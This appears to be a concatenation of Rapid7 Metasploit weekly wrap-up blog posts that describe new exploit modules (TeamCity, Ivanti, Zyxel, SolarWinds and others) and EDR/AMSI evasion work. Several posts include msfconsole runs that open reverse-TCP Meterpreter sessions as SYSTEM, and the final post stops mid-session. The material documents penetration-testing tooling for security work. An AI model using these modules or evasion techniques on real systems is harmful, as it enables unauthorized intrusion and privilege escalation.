Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/04/05/metasploit-weekly-wrap-up-04-05-2024/

New ESC4 Templates for AD CS

Metasploit added capabilities for exploiting the ESC family of flaws in AD CS in Metasploit 6.3. The ESC4 technique in particular has been supported for some time now thanks to the ad_cs_cert_templates module which enables users to read and write certificate template objects. This facilitates the exploitation of ESC4 which is a misconfiguration in the access controls of the LDAP object, allowing an attacker to tamper with them. This is typically used by an attacker to modify a certificate template object they are capable of modifying to make it susceptible to ESC1. Metasploit offers a premade template for ESC1 that a user could select to perform this attack.

This attack workflow was expanded on this week with two new templates for ESC2 and ESC3. These new templates allow Metasploit users that are concerned about ESC1 being detected with alternative options for exploitation. Additionally, the premade templates can be edited, to for example restrict permissions to a particular SID by changing the SDDL text of the ntSecurityDescriptor.

New module content (2)

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

Authors: Charles Fol (Ambionics Security), Dylan Pindur (AssetNote), Misterxid, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18915 contributed by h00die-gr3y
Path: linux/http/watchguard_firebox_unauth_rce_cve_2022_26318
AttackerKB reference: CVE-2022-26318

Description: This PR adds a module for a buffer overflow at the administration interface of WatchGuard Firebox and XTM appliances. The appliances are built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

Jenkins CLI Ampersand Replacement Arbitrary File Read

Authors: Vozec, Yaniv Nizry, binganao, h00die, and h4x0r-dz
Type: Auxiliary
Pull request: #18764 contributed by h00die
Path: gather/jenkins_cli_ampersand_arbitrary_file_read
AttackerKB reference: CVE-2024-23897

Description: This PR adds a new module to exploit CVE-2024-23897, an unauthorized arbitrary (first 2 lines) file read on Jenkins versions prior to 2.442 or for the LTS stream, versions prior to 2.426.3.

Enhancements and features (4)

• #18906 from zeroSteiner – This PR adds support for leveraging the ESC4 attack on misconfigured AD-CS servers to introduce ESC2 and ESC3.
• #18933 from sjanusz-r7 – Updates the new SQL session types to correctly remember previous commands that the user has entered.
• #19003 from ArchiMoebius – Updates msfvenom and payload generation to support formatting payloads as a Zig buffer.
• #19014 from cgranleese-r7 – Adds an initial set of acceptance tests for MySQL modules and session types.

Bugs fixed (3)

• #18935 from zeroSteiner – This PR fixes a common user mistake when authenticating with LDAP modules. Now, users can specify either the USERNAME (user) and DOMAIN (domain.local) datastore options or the original format of just the USERNAME in the UPN format ([email protected]). This fix updates the LDAP library.
• #19007 from dwelch-r7 – Fixes a regression that affected exploit/multi/http/log4shell_header_injection module which stopped the module from running successfully.
• #19021 from cgranleese-r7 – Updates the admin/mysql/mysql_enum module to work with newer versions of MySQL.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.1…6.4.2
• Full diff 6.4.1…6.4.2

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2024/01/26/metasploit-weekly-wrap-up-01-26-24/

Direct Syscalls Support for Windows Meterpreter

Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do so is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Direct syscalls are a way to run system calls directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with Direct Syscalls to the corresponding Native API’s. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is to find the correct syscall number since it is not the same across Windows versions. Also, EDR’s usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo’s Gate.

Another improvement is to make sure the call to the syscall instruction is made through ntdll.dll. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using Direct Syscalls. The long-term goal is to make Direct Syscalls a standard for any future Windows-based development (payload, exploit, etc.).

New module content (8)

GL.iNet Unauthenticated Remote Command Execution via the logread module.

Authors: DZONERZY, Unknown, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18648 contributed by h00die-gr3y
Path: linux/http/glinet_unauth_rce_cve_2023_50445

Description: This PR adds an exploit module for a number of different GL.iNet network products. The module combines an authentication by-pass vulnerability (CVE-2023-50919) with an RCE (CVE-2023-50445) allowing the user to remotely obtain, without authentication, a Meterpreter session running in the context of the root user.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18708 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2023_46805

Description: This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.

MajorDoMo Command Injection

Authors: Valentin Lobstein and smcintyre-r7
Type: Exploit
Pull request: #18630 contributed by Chocapikk
Path: linux/http/majordomo_cmd_inject_cve_2023_50917

Description: This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

Saltstack Minion Payload Deployer

Authors: c2Vlcgo and h00die
Type: Exploit
Pull request: #18626 contributed by h00die
Path: linux/local/saltstack_salt_minion_deployer

Description: This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.

Apache Commons Text RCE

Authors: Alvaro Muñoz, Gaurav Jain, and Karthik UJ
Type: Exploit
Pull request: #18638 contributed by errorxyz
Path: multi/http/apache_commons_text4shell

Description: Adds an exploit module for CVE-2022-42889 that targets web apps utilizing Apache Commons Text’s (1.5-1.9) StringSubstitutor interpolator class in an insecure fashion.

Atlassian Confluence SSTI Injection

Authors: Harsh Jaiswal, Rahul Maini, and Spencer McIntyre
Type: Exploit
Pull request: #18734 contributed by zeroSteiner
Path: multi/http/atlassian_confluence_rce_cve_2023_22527

Description: This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.

PRTG CVE-2023-32781 Authenticated RCE

Author: Kevin Joensen [email protected]
Type: Exploit
Pull request: #18568 contributed by ggisz
Path: windows/http/prtg_authenticated_rce_cve_2023_32781

Description: This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier. The result is command execution as SYSTEM.

Memory Search

Author: sjanusz-r7
Type: Post
Pull request: #18713 contributed by sjanusz-r7
Path: multi/gather/memory_search

Description: Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.

Enhancements and features (6)

• #17634 from adfoster-r7 – Reliability and stability notes that have been previously missing have been added to some modules.
• #18645 from jvoisin – This adds a way to get the Build ID from ld.so by using the ‘perf’ command. Before this module depended on the commands ‘file’ and ‘readelf’ being installed to get the Build ID.
• #18663 from sjanusz-r7 – Adds a new Postgres session type, which is current behind a feature flag that can be activated with: features set postgresql_session_type true. Example usage: use scanner/postgres/postgres_login followed by run postgres://postgres:[email protected]:9000/template1 createsession=true verbose=false.
• #18720 from zeroSteiner – This enhancement marks the existing Unix encoders as also being compatible with Linux. Previously, no encoder modules were marked as compatible with Linux, so users could not set bad character when using the new fetch payloads.
• #18735 from AleksaZatezalo – Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
• #18737 from zeroSteiner – This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.

Bugs fixed (3)

• #18662 from dwelch-r7 – Fixes an edgecase where features set dns_feature true did not correctly parse a user’s /etc/resolv.conf file if there were multiple nameservers present.
• #18712 from ekalinichev-r7 – Fixes a crash with Metasploit’s REST api when calling /api/v1/modules?name=aux.
• #18746 from zeroSteiner – Fixes a module bug when using the generate OPTION=VALUE syntax. Previously, the module’s datastore would be unintentionally updated with the new option value.

Documentation added (1)

• #18729 from poupapaa – This fixes a typo in Metasploit-Guide-SMB.md.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.52…6.3.53
• Full diff 6.3.52…6.3.53

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/09/29/metasploit-weekly-wrap-up-29/

TeamCity authentication bypass and remote code execution

This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.

This exploit works against both Windows and Linux targets. Example usage:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for the changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting the internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting the authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >

New module content (2)

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for JetBrain’s TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

Microsoft Error Reporting Local Privilege Elevation Vulnerability

Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10×64 22H2.

Enhancements and features (1)

• #18399 from h00die – Fixes multiple spelling mistakes in module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.35…6.3.36
• Full diff 6.3.35…6.3.36

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/06/16/metasploit-weekly-wrap-up-15/

Metasploit T-Shirt Design Contest

In honor of Metasploit’s 20th anniversary, Rapid7 is launching special edition t-shirts – and we’re inviting members of our community to have a hand in its creation. The contest winner will have their design featured on the shirts, which will then be available to pick up at Black Hat 2023.

We will be accepting submissions from now through June 30! Contest details, design guidelines, and submission instructions here

New module content (12)

RPyC 4.1.0 through 4.1.1 Remote Command Execution

Authors: Aaron Meese and Jamie Hill-Daniel
Type: Auxiliary
Pull request: #17670 contributed by ajmeese7
AttackerKB reference: CVE-2019-16328

Description: Adds a new rpyc_rce module to exploit CVE-2019-16328 and achieve remote command execution as the vulnerable server’s service user.

Apache RocketMQ Version Scanner

Authors: Malayke and h00die
Type: Auxiliary
Pull request: #18075 contributed by h00die

Description: This PR adds a version scanner for Apache RocketMQ.

Symmetricom SyncServer Unauthenticated Remote Command Execution

Authors: Justin Fatuch Apt4hax, Robert Bronstein, and Steve Campbell
Type: Exploit
Pull request: #18077 contributed by sdcampbell
AttackerKB reference: CVE-2022-40022

Description: This adds an exploit for Symmetricom SyncServer appliances (S100-S300 series) vulnerable to an unauthenticated command injection in the hostname parameter in a request to the /controller/ping.php endpoint. The command injection vulnerability is patched in the S650 v2.2. Requesting the endpoint will result in a redirect to the login page; however, the command will still be executed, resulting in RCE as the root user.

TerraMaster TOS 4.2.06 or lower – Unauthenticated Remote Code Execution

Authors: IHTeam and h00die-gr3y
Type: Exploit
Pull request: #18063 contributed by h00die-gr3y
AttackerKB reference: CVE-2020-28188

Description: This adds an exploit for TerraMaster NAS devices running TOS 4.2.06 or prior. The logic in include/makecvs.php permits shell metacharacters through the Event parameter in a GET request, permitting the upload of a webshell without authentication. Through this, an attacker can achieve remote code execution as the user running the TOS web interface.

TerraMaster TOS 4.2.15 or lower – RCE chain from unauthenticated to root via session crafting.

Authors: h00die-gr3y and n0tme
Type: Exploit
Pull request: #18070 contributed by h00die-gr3y
AttackerKB reference: CVE-2021-45841

Description: This exploits a series of vulnerabilities including session crafting and command injection in TerraMaster NAS versions 4.2.15 and below to achieve unauthenticated RCE as the root user.

TerraMaster TOS 4.2.29 or lower – Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989

Authors: 0xf4n9x, Octagon Networks, and h00die-gr3y
Type: Exploit
Pull request: #18086 contributed by h00die-gr3y
AttackerKB reference: CVE-2022-24989

Description: This exploits an administrative password leak and command injection vulnerability on TerraMaster devices running TerraMaster Operating System (TOS) versions 4.2.29 and below to achieve unauthenticated RCE as the root user.

Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution

Author: sf
Type: Exploit
Pull request: #18016 contributed by sfewer-r7
AttackerKB reference: CVE-2023-28771

Description: This adds an exploit for CVE-2023-28771 which is a remote, unauthenticated OS command injection in IKE service of several Zyxel devices. Successful exploitation results in remote command execution as the root user.

Oracle Weblogic PreAuth Remote Command Execution via ForeignOpaqueReference IIOP Deserialization

Authors: 14m3ta7k, 4ra1n, and Grant Willcox
Type: Exploit
Pull request: #17946 contributed by gwillcox-r7
AttackerKB reference: CVE-2023-21839

Description: This adds an exploit for CVE-2023-21839 which is an unauthenticated RCE in Oracle Weblogic. Successful exploitation results in remote code execution as the oracle user.

Three x86 Linux Fetch Payloads

Author: Spencer McIntyre
Type: Payload
Pull request: #18084

Description: Fetch and execute a x86 payload from an HTTP server. These modules were developed live on stream. Fetch based payloads offer a shorter path from command injection to a Metasploit session

Authors: Daniel López Jiménez (attl4s) and Simone Salucci (saim1z)
Type: Post
Pull request: #18022 contributed by attl4s

Description: This adds the post/windows/manage/make_token module which is capable of creating new tokens from known credentials and then setting them in a running instance of Meterpreter, which can allow that session to access resources it might not have previously been able to access.

Enhancements and features (11)

• #17336 from smashery – This PR adds new code to simplify and standardize windows version checking and comparisons.
• #17781 from araout42 – Adds support for module writers to supply a custom include_dirs array when using the MinGW library to compile payloads.
• #17942 from cdelafuente-r7 – The script generated by the web_delivery module is blocked by the Antimalware Scan Interface (AMSI) on newer versions of windows. This PR includes an enhancement which allows the web_delivery module to bypass AMSI.
• #17955 from jvoisin – Reduces the size of PHP payloads such as php/reverse_php.
• #18050 from adfoster-r7 – Adds a new post/test/all module which will run all available post/test modules against the open session.
• #18069 from sempervictus – This updates the LDAP server library to handle unbind requests.
• #18089 from shellchocolat – Adds supports for masm output format when generating payloads.
• #18106 from adfoster-r7 – This PR updates Meterpreter’s setg SessionTLVLogging true support to no longer truncate useful values such as payload UUIDs, file paths, executed commands etc.
• #18109 from adfoster-r7 – Update test post modules to always have a clean, writable, and consistent test file system directory when running modules under the loadpath test/modules directory.
• #18110 from adfoster-r7 – When running test modules that have been loaded by loadpath test/modules, any verbose printing logic generated will now be prefixed by the current test that is being run.
• #18115 from adfoster-r7 – This PR updates unknown windows errors on python Meterpreter to include original error code.

Bugs fixed (15)

• #18051 from adfoster-r7 – Adds additional skip calls to the test/post modules to ensure that only relevant test expectations are run against the specified session without crashes.
• #18054 from bwatters-r7 – This PR fixes the issue where an ArgumentError was thrown on the FETCH_SRVHOST option when running the info command when using a fetch payload.
• #18068 from smashery – Fixes a bug that caused multi/manage/shell_to_meterpreter to not break when win_transfer=VBS was set.
• #18076 from smashery – This fixes a bug in the Windows Meterpreter’s memory free API.
• #18083 from zeroSteiner – A bug has been fixed in the stdapi extension of Meterpreter when calling the stdapi_sys_process_memory_free command. This incorrectly handled memory, leading to a double free condition, which would crash Meterpreter. This has since been fixed.
• #18090 from adfoster-r7 – The auxiliary/admin/kerberos/keytab EXPORT action will now consistently order exported entries.
• #18097 from adfoster-r7 – This PR fixes Python Meterpreter sessions from crashing when extracting macOS network configuration when using the route or ipconfig commands.
• #18098 from adfoster-r7 – This PR Fixes rex-text crashes when running ruby 3.3.
• #18099 from adfoster-r7 – This PR fixes Python Meterpreter subprocess deadlock and file descriptor leak caused by the stdout/stderr file descriptors not being closed.
• #18101 from adfoster-r7 – This PR fixes a Python Meterpreter macOS route command crash when ifconfig has a gateway name as a mac address separated by dots.
• #18102 from adfoster-r7 – This PR adds a fix for false negatives on files not existing on windows python Meterpreter.
• #18105 from adfoster-r7 – This PR fixes a bug when running the time command in msfconsole with complex commands.
• #18108 from adfoster-r7 – Updates the test/services module to more consistently pass. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
• #18111 from adfoster-r7 – This PR fixes an initialized constant error when Meterpreter registry key reads timeout.
• #18112 from adfoster-r7 – This PR fixes a symlink test bug when running python Meterpreter on windows.

Documentation added (1)

• #18058 from gwillcox-r7 – Adds additional details on how to navigate the Metasploit codebase.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.20…6.3.21
• Full diff 6.3.20…6.3.21

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/05/12/metasploit-weekly-wrap-up-10/

Chaining for the win #1: Pentaho Business Server

This week, our very own jheysel-r7 added an exploit module that leverages two vulnerabilities in Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x. The module chains an authentication bypass (CVE-2022-43939) and Server Side Template Injection – SSTI – (CVE-2022-43769) to achieve unauthenticated code execution as the user running the application. Patches are available and It is highly recommended to apply them as soon as possible. The exploit is straightforward to execute and very reliable.

Chaining for the win #2: Zyxel

Community contributor h00die-gr3y added another exploit module that also chains two vulnerabilities, this time targeting Zyxel devices. It exploits an unauthenticated local file disclosure – LFI – (CVE-2023-28770) vulnerability and a weak password derivation algorithm to obtain unauthenticated remote code execution as the supervisor user. These vulnerabilities affect the zhttpd and zcmd binaries, respectively, which are present on more than 40 Zyxel routers and CPE devices. The module leverages a LFI to read the entire configuration of the router, from which it derives the supervisor password by exploiting a weak password derivation algorithm. Finally, if the device is reachable via SSH, the module establishes a connection using the leaked supervisor credentials to execute commands.

GSoC Project: Enable HTTP-Trace for scanner modules

One more successful GSoC project to enhance Metasploit has landed this week. Contributor 3V3RYONE, extended the HTTP-Trace capability to login scanner modules, which was only available to exploit modules before. That’s a very useful feature to debug a module by allowing users to display the full HTTP requests and responses of scanner modules within msfconsole. More information about previous Metasploit GSoC projects can be found here.

Here is an example output of a login scanner module running with the HTTPTrace feature enabled:

msf6 > use auxiliary/scanner/http/buffalo_login 
msf6 auxiliary(scanner/http/buffalo_login) > set RHOSTS www.example.com
RHOSTS => www.example.com
msf6 auxiliary(scanner/http/buffalo_login) > set USERPASS_FILE data/wordlists/http_default_userpass.txt
USERPASS_FILE => data/wordlists/http_default_userpass.txt
msf6 auxiliary(scanner/http/buffalo_login) > set HttpTrace true
HttpTrace => true
msf6 auxiliary(scanner/http/buffalo_login) > run

####################
# Request:
####################
POST /dynamic.pl HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

bufaction=verifyLogin&user=connect&password=connect
####################
# Response:
####################
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Mon, 26 Sep 2022 06:21:16 GMT
Connection: close

[...]

New module content (3)

Zyxel chained RCE using LFI and weak password derivation algorithm

Authors: Bogi Napoleon Wennerstrøm, SEC Consult Vulnerability Lab, Thomas Rinsma, and h00die-gr3y
Type: Exploit
Pull request: #17881 contributed by h00die-gr3y
AttackerKB reference: CVE-2023-28770

Description: This adds a new exploit module that leverages multiple vulnerabilities in the zhttpd and zcmd binaries, which are present on more than 40 Zyxel routers and CPE devices, to achieve remote code execution as user supervisor. This chains a local file disclosure vulnerability that allows an unauthenticated attacker to read the configuration file and a weak password derivation algorithm vulnerability. The module uses the leaked credentials to establish a SSH connection and execute commands.

Pentaho Business Server Auth Bypass and Server Side Template Injection RCE

Authors: Harry Withington, dwbzn, and jheysel-r7
Type: Exploit
Pull request: #17964 contributed by jheysel-r7
AttackerKB reference: CVE-2022-43939

Description: A new module has been added which exploits Hitachi Vantara Pentaho Business Analytics Server versions before 9.4.0.1 and 9.3.0.2, including 8.3.x. To do this it first exploits CVE-2022-43939 to bypass authentication before using CVE-2022-43769, a Server Side Template Injection (SSTI) vulnerability, to achieve unauthenticated code execution as the user running the Pentaho Business Analytics Server.

ManageEngine ADAudit Plus Authenticated File Write RCE

Authors: Erik Wynter and Moon
Type: Exploit
Pull request: #17133 contributed by ErikWynter
AttackerKB reference: CVE-2021-42847

Description: A new exploit module has been added which gains authenticated RCE on ManageEngine AdAudit builds 7005 and prior by creating a custom alert profile and leveraging the custom alert script component. On builds 7004 and later, CVE-2021-42847 is utilized to gain RCE as the user running AdAudit, which will typically be a local administrator, via an arbitrary file write to create the necessary script for the alert profile.

Enhancements and features (3)

• #17060 from 3V3RYONE – Updates the HTTP scanner modules with the functionality to log both HTTP requests and responses. This functionality can be enabled with set HTTPTrace true. This functionality is useful for debugging modules. In scenarios where the traffic is encrypted, for instance with WinRM, the logged values will be unencrypted.
• #17807 from gwillcox-r7 – Adds documentation for Metasploit’s folder structure, so that those unfamiliar with Metasploit can quickly get up to speed and understand where files might be located or where to place new files when developing content for Metasploit.
• #17972 from h00die – Updates the example modules to align with the latest Metasploit framework module conventions.

Bugs fixed (2)

• #17968 from zeroSteiner – A bug has been fixed where Certificate Templates were not being identified as vulnerable when there was an ACE that granted enrollment rights but did not correspond to any object types. The logic has now been updated so that only ACEs associated with an object that is neither the CERTIFICATE_ENROLLMENT_EXTENDED_RIGHT right nor the CERTIFICATE_AUTOENROLLMENT_EXTENDED_RIGHT right will be ignored.
• #17980 from sempervictus – This fixes the file system path check used by PowerShell sessions.

Documentation added (1)

• #17984 from adfoster-r7 – Fixes a Kerberos datastore name typo in the WinRM wiki docs.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.15…6.3.16
• Full diff 6.3.15…6.3.16

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2023/03/31/metasploit-weekly-wrap-up-198/

Windows 11 ADF WinSock Priv Esc

The new windows/local/cve_2023_21768_afd_lpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write primitive on Windows 11. This exploit is a write-where bug that allows arbitrary write of one byte in kernel memory. This is enough to modify the I/O ring internal structures and get remote code execution as the NT AUTHORITY\SYSTEM user. The Metasploit module is based on the exploit PoC authored by chompie1337 and b33f .

Example running with Windows 11 Version 22H2 Build 22621.963 x64:

msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true
[*] Started reverse TCP handler on 192.168.100.9:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Windows Build Number = 22621.963
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 3748 launched.
[*] Reflectively injecting the DLL into 3748...
[*] Sending stage (200774 bytes) to 192.168.100.9
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 11 opened (192.168.100.9:4444 -> 192.168.100.9:55346) at 2023-03-27 18:46:08 +0200
meterpreter >

SolarWinds RCE and AMQP Support

Metasploit 6.3.10 now has support for the Advanced Message Queuing Protocol (AMQP). This protocol is used in services such as RabbitMQ. Three new modules have been added that leverage this functionality thanks to the work of our very own Spencer McIntyre:

The exploits/windows/misc/solarwinds_amqp_deserialization module adds an exploit for CVE-2022-38108 which is an authenticated .NET deserialization vulnerability within the SolarWinds platform’s SWIS (SolarWinds Information Service) component. To trigger the vulnerability, an attacker must authenticate to the RabbitMQ (message queue) server (via the AMQP protocol) and publish a specially crafted object. Once SWIS receives the message, it will deserialize it, allowing for OS command execution as NT AUTHORITY\SYSTEM. Example targeting SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64:

msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run
[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
